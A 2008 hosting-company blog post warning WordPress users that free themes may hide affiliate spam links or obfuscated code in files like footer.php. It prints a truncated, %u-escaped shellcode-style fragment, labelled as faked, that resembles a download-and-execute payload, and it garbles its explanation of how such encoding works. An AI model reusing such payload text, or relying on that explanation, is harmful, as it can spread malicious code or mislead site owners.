34SP.com
Status . STATUS
.
Support . SUPPORT
.
Log in . LOG IN
.
Account . £0.00 .
.
.
---
Hosting | Domains | Contact us | Order
home wordpress-vertical-band resources wordpress-vertical-band bestof wordpress-vertical-band kb
.
 Hosting servers
  Archive for April, 2008
 WordPress Themes: Look Out For Boobytraps
Posted by Val on Thursday, April 3rd, 2008

There are now several sites offering free WordPress themes for downloads. Many are excellent, but if you decide to use one on your WP site, it might pay to check the template closely.
For instance, I downloaded one last year; when I had it up on the site and was checking it, I noticed a strange link in the footer, in a very small font. Checking it, I found it was an affiliate link leading to a site selling fake pharmaceuticals. People browsing my site could have clicked on it out of curiosity and rewarded some spammer.
That one was easy to deal with, but the next “booby-trapped” template I came across was very different. It was a good-looking, beautifully-produced template with a high “wow!” factor; I wondered why the designer was giving it away, when plenty of people would have been happy to pay for such a great piece of design. It was only when I opened up the template’s footer.php to paste in a Google ad that I realised why it was being given away.
Viewed in the browser, the footer looked perfectly normal, with just the usual WordPress and designer links; the source code, however, revealed a mass of obfusticated code looking like this:%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0 320 u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2 uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B
%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B
%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A
%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B
%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40
%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u 8304
%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u 8BFF
%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%u BF5D
%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%u D0FF
%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%u FFFF
%u7468%u7074%u2F3A%u362F%u2E36%u
(this is faked code)
Obfusticated code is where each character is replaced by its HTML character entity - ‘&’ is replaced by &, for instance. It’s unreadable to humans, but the browser automatically interprets it. Then, according to what the code is, the browser will either display it as text, or will execute something.
It’s a technique that’s often used to disguise email addresses on web pages; however, there’s no need, normally, to disguise URLs. I didn’t know what the code was intended to do, but there was no reason for it to be there; and it could very well have made my site a channel to drop malaware into the PCs of anyone viewing it. So I deleted it straightaway. I did email the template’s designer about it. But I’m still waiting for a reply, weeks later.

So, although there are loads of perfectly good, safe WP themes out there; check every one that you decide to use, just in case. Malware/spyware writers are clearly getting slicker in their approach.

Posted in Wordpress | No Comments »
.
SEARCH FORM
.
CATEGORIES
  • Plugins (2)
  • Themes (4)
  • Wordpress (11)
    • .
    copyright
    All content and design copyright of 34SP.com Ltd.
    Registration no: 4201170
    .
    support . | . other services . | . about 34SP.com . | . contact . | . sitemap
    .